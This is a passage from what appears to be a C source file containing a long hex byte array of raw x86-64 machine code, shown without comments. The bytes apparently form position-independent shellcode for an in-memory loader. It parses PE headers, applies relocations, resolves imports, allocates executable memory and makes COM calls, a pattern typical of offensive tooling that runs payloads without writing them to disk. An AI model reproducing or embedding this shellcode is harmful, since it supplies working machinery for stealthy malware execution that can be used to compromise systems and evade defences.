568 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48,
569 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48,
570 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85,
571 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00,
572 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
573 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02,
574 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
575 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83,
576 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00,
577 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38,
578 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b,
579 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b,
580 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89,
581 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
582 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
583 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
584 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
585 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00,
586 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01,
587 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00,
588 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00,
589 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64,
590 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48,
591 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff,
592 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
593 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00,
594 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
595 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1,
596 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b,
597 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48,
598 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
599 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02,
600 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b,
601 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b,
602 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30,
603 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
604 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
605 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85,
606 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b,
607 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b,
608 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00,
609 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
610 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85,
611 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f,
612 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
613 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
614 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b,
615 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01,
616 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85,
618 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
619 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20,
620 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
621 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00,
622 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
623 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00,
624 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
625 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00,
626 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
627 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48,
628 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00,
629 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff,
630 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83,
631 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80,
632 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
633 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
634 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
635 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10,
636 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01,
637 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff,
638 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07,
639 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
640 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
641 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
642 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f,
643 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45,
644 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1,
645 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d,
646 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00,
647 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d,
648 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44,
649 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00,
650 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11,
651 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
652 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
653 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85,
654 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85,
655 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48,
656 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8,
657 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb,
658 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89,
659 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
660 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90,
661 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74,
662 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50,
663 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00,
664 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb,
665 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55,
666 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48,
667 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
668 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
669 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
670 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
671 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92,
672 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41,
673 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9,
674 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83,
675 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
676 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92,
677 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55,
678 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
679 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
680 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
681 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
682 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
683 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec,
684 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48,
685 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d,
686 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a,
687 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24,
688 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
689 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00,
690 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b,
691 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0,
692 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45,
693 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66,
694 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48,
695 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00,
696 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89,
697 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0,
698 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b,
699 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0,
700 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b,
701 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
702 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
703 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
704 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10,
705 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48,
706 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00,
707 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48,
708 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41,
709 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
710 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30,
711 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
712 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00,
713 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
714 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
715 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
716 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
717 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
718 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
719 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01,
720 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00,
721 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
722 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00,
723 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
724 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00,
725 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89,
726 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
727 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0,
728 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff,
729 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00,
730 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00,
731 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01,
732 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00,
733 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85,
734 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48,
735 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00,
736 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00,
737 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00,
738 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
739 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00,
740 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02,
741 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
742 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c,
743 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
744 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80,
745 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41,
746 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
747 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00,
748 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
749 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0,
750 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b,
751 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00,
752 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
753 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
754 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48,
755 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89,
756 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00,
757 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
758 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
759 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b,
760 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00,
761 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
762 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
763 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48,
764 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00,
765 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00,
766 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
767 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b,
768 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff,
769 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
770 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
771 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c,
772 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b,
773 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28,
774 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01,
775 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48,
776 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
777 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00,
778 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
779 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
780 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01,
781 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48,
782 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
783 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00,
784 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
785 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48,
786 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
787 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
788 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
789 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
790 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89,
791 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
792 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14,
793 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba,
794 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00,
795 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48,
796 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
797 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30,
798 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
